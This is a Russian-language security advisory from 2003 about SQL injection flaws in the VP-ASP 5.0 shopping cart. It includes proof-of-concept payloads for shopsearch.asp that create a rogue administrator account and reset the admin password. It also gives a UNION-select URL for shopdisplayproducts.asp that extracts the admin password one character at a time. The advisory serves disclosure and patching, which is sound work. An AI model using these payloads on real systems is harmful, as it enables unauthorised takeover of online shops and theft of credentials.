| Дата публикации: | 03.12.2003 |
| Всего просмотров: | 2142 |
| Опасность: | Высокая |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Уязвимые версии: VP-ASP 5.0
Описание: Несколько уязвимостей обнаружено в VP-ASP shopping cart. Удаленный пользователь может выполнить произвольные команды на целевой системе. Уязвимость SQL инъекции обнаружена в 'shopsearch.asp' и 'shopdisplayproducts.asp' сценариях. Удаленный пользователь может выполнить произвольный SQL код на целевой базе данных, включая команды операционной сисемы. Пример/Эксплоит:
-- PoC code 1:
Платформы: Win32/MSSQL
Posting this data to shopsearch.asp creates new administrative account
Keyword=&category=5); insert into tbluser (fldusername) values
('qasdew')--&SubCategory=&hide=&action.x=46&action.y=6
Keyword=&category=5); update tbluser set fldpassword='edsaqw' where
fldusername='qasdew'--&SubCategory=All&action.x=33&action.y=6
Keyword=&category=3); update tbluser set fldaccess='1' where
fldusername='qasdew'--&SubCategory=All&action.x=33&action.y=6
Posting this data to shopsearch.asp changes admin password
Keyword=&category=5); update tbluser set fldpassword='edsaqw' where
fldusername='admin'--&SubCategory=All&action.x=33&action.y=6
-- Vulnerability 2: SQL Injection vulnerability in
'shopdisplayproducts.asp' script
An SQL Injection vulnerability has been found in the
shopdisplayproducts.asp script.
Exploitation of the vulnerability will allow remote attacker to read any
information from a database.
-- PoC code 2:
Платформы: Win32/MSSQL
http://somehost.com/vpasp/shopdisplayproducts.asp?cat=qwerty'%20union%20select%
20fldauto,fldpassword%20from%20tbluser%20where%20fldusername='admin'%20and%
20fldpassword%20like%20'a%25'--
changing value at the end of request
%20'a%25'--
%20'b%25'--
%20'c%25'--
...
and looking through the HTTP response from VP-ASP web server attacker
can find the admin password.
URL производителя:http://www.vpasp.com Решение: Установите обновленную версию программы: http://www.vpasp.com/virtprog/info/faq_securityfixes.htm |
|
| Ссылки: | Virtual Programming VP-ASP Shopping Cart 5.0 multiple SQL Injection |